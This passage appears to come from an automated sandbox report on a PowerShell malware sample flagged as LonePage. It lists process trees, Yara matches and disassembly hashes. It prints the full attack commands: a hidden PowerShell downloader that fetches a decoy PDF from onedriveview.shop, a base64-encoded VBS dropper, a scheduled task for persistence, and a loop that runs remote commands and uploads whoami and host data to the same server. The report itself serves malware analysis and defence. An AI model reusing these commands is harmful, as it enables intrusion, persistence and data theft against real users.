$dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                                                Icon location:C:\program files\windows nt\accessories\wordpad.exe

                                                                                Network Behavior

                                                                                No network behavior found

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:09:30:07
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.1848046574.000001B6E42DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.1848046574.000001B6E3DE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:09:30:07
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:09:30:13
                                                                                Start date:30/09/2024
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
                                                                                Imagebase:0x7ff6bc1b0000
                                                                                File size:5'641'176 bytes
                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:3
                                                                                Start time:09:30:13
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
                                                                                Imagebase:0x7ff76f990000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:09:30:16
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                                                Imagebase:0x7ff6c57d0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000004.00000002.1912194930.00000212ADC85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000004.00000002.1912015299.00000212AD926000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000004.00000002.1912015299.00000212AD8F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000004.00000002.1912015299.00000212AD95E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:09:30:25
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2765832433.00000253685AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2765832433.0000025368520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:09:30:16
                                                                                Start date:30/09/2024
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                Imagebase:0x7ff74bb60000
                                                                                File size:3'581'912 bytes
                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:09:30:18
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff6eef20000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:09:30:18
                                                                                Start date:30/09/2024
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2232 --field-trial-handle=1508,i,8450144638513138785,4609180756953587241,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                Imagebase:0x7ff74bb60000
                                                                                File size:3'581'912 bytes
                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:11
                                                                                Start time:09:30:26
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:09:33:01
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                                                Imagebase:0x7ff6c57d0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000011.00000002.3468994470.000002B4BA7C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000011.00000002.3468473632.000002B4BA491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000011.00000002.3468473632.000002B4BA42B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000011.00000002.3468473632.000002B4BA437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000011.00000002.3468473632.000002B4BA472000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:18
                                                                                Start time:09:33:01
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4141081747.000001ABD3EC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4143788357.000001ABD6830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4143788357.000001ABD5E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4141081747.000001ABD3F4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000012.00000002.4143788357.000001ABD5C2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:19
                                                                                Start time:09:33:01
                                                                                Start date:30/09/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B7E6DC1 Relevance: .7, Instructions: 653COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903470636.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7edaaa448ca3a3a99caa23d216136a11a6a979b0c75db40cc342781b0a7f2f54
                                                                                  • Instruction ID: 926be4e2e166efee3c0189c88e9caff6f09b2bb99b0844ef5a5a2c5e46c6b6df
                                                                                  • Opcode Fuzzy Hash: 7edaaa448ca3a3a99caa23d216136a11a6a979b0c75db40cc342781b0a7f2f54
                                                                                  • Instruction Fuzzy Hash: 1D123821B0F7C91FE766977858655B43FE1EF56210B0A02FBD089CB1F3D919AD058392
                                                                                  Function 00007FFD9B7E091E Relevance: .5, Instructions: 468COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903470636.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c917e7ec7a3d35aa78d6e5f9726183c727c29a0c7604247526ebe1508671973
                                                                                  • Instruction ID: 27fd551497e9c952ca94a6cf77b6a59079e7f5b78f9909ba7ac4b194dee1559d
                                                                                  • Opcode Fuzzy Hash: 2c917e7ec7a3d35aa78d6e5f9726183c727c29a0c7604247526ebe1508671973
                                                                                  • Instruction Fuzzy Hash: 5BD1F662B0F7C90FE76697B848766A47FE1EF56610B0A02FBD099CB1F3D9086945C312
                                                                                  Function 00007FFD9B7E3475 Relevance: .4, Instructions: 436COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903470636.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec95e16151f3b0830a4d9be4a7e7b4847d83f2f2d6ab6bf56b24e829246695a9
                                                                                  • Instruction ID: bf6383335aa98b7ba0b7834986f6e82d931aa77367b248b60e0084fe9fe59455
                                                                                  • Opcode Fuzzy Hash: ec95e16151f3b0830a4d9be4a7e7b4847d83f2f2d6ab6bf56b24e829246695a9
                                                                                  • Instruction Fuzzy Hash: 67D14972A0FBCE0FE7A69BA844645B57BA1EF56310B0A02FED05DC71F3DA199904C351
                                                                                  Function 00007FFD9B7E09EA Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903470636.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddb09d0b10f6699e3160765749f2a5c3859d952e6e879ba1f86a0d64afb29900
                                                                                  • Instruction ID: 41ba195d655ebd2c2d7d1a97710a28afe945dd0c5fe11b300df267026a1e6376
                                                                                  • Opcode Fuzzy Hash: ddb09d0b10f6699e3160765749f2a5c3859d952e6e879ba1f86a0d64afb29900
                                                                                  • Instruction Fuzzy Hash: 4131A312B0FBCE0FE7B566A804B62B836D1AF51654B1A02BAD49EC61F3DC0C6D458301
                                                                                  Function 00007FFD9B7E6FE7 Relevance: .1, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903470636.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 76a014104fe97138f1e25b46704d047cfc14e4711dee3099e5a611ca8cd6fb09
                                                                                  • Instruction ID: edf6d70199eb1951660d835cd86f29716202211b8448a917086ddf9589a98b73
                                                                                  • Opcode Fuzzy Hash: 76a014104fe97138f1e25b46704d047cfc14e4711dee3099e5a611ca8cd6fb09
                                                                                  • Instruction Fuzzy Hash: AE11D323F1FA0E1BF6B89658647A5B832C1EF84210B4603B6E40DC61F2ED1D7D0106C1
                                                                                  Function 00007FFD9B7137B5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903129774.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b710000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8b55fa4ea63c8dc4b0e19ccf546164bdc454e9153b188f8536ba7a82a501c8da
                                                                                  • Instruction ID: a26109fed9e2451729cc5c746efa3a0b7cdb6b33b735bd8f0b38c98dd0e3d85e
                                                                                  • Opcode Fuzzy Hash: 8b55fa4ea63c8dc4b0e19ccf546164bdc454e9153b188f8536ba7a82a501c8da
                                                                                  • Instruction Fuzzy Hash: D101A77021CB0D4FDB48EF0CE051AA6B3E0FB85324F10056DE58AC36A5D732E882CB41

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD9B71246D Relevance: .4, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1903129774.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b710000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3b0392229db34db806af913ed66159ac2ee712b617dddf45bd8350aabd4e4988
                                                                                  • Instruction ID: a51b4f8a8dc5339951d26c9d1b5239105ed3e35faed3dd6670bd37bfed2e14c3
                                                                                  • Opcode Fuzzy Hash: 3b0392229db34db806af913ed66159ac2ee712b617dddf45bd8350aabd4e4988
                                                                                  • Instruction Fuzzy Hash: 6FC18D57B0F7D61FE72246AC58765EA3FA0EF9362870E22F7C4D54A4F3DD0929068221

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B7B161B Relevance: .5, Instructions: 497COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2774353174.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b7b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7fc6e369fb8cc66c7f261cc9f884ae4a7242cf0f06b10a0b97795d871c345b7b
                                                                                  • Instruction ID: e23226d714cc7a26bbc0078599a4dabfeebf1e6665d494e09a3add2533f3c307
                                                                                  • Opcode Fuzzy Hash: 7fc6e369fb8cc66c7f261cc9f884ae4a7242cf0f06b10a0b97795d871c345b7b
                                                                                  • Instruction Fuzzy Hash: 1DE10222A1FBDA0FE766976808756B57BE1EF56250B0A02FBD099CB4F3DD086D058B01
                                                                                  Function 00007FFD9B7B3F95 Relevance: .5, Instructions: 487COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2774353174.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b7b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3c61d5b1e35a11e96520b78a5d6d8d803802370d8cb0965ef3eea23e5925be7
                                                                                  • Instruction ID: f1b99bd947f2f335fa643a0f03cf5e786fa3ac091991c765ab25b41ffb9060d4
                                                                                  • Opcode Fuzzy Hash: d3c61d5b1e35a11e96520b78a5d6d8d803802370d8cb0965ef3eea23e5925be7
                                                                                  • Instruction Fuzzy Hash: E0E12422A0EBDE0FEB6697A848655A57FA1EF56314B0902FFD48CCB0F3D9199D05CB01
                                                                                  Function 00007FFD9B7B3FBE Relevance: .3, Instructions: 334COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
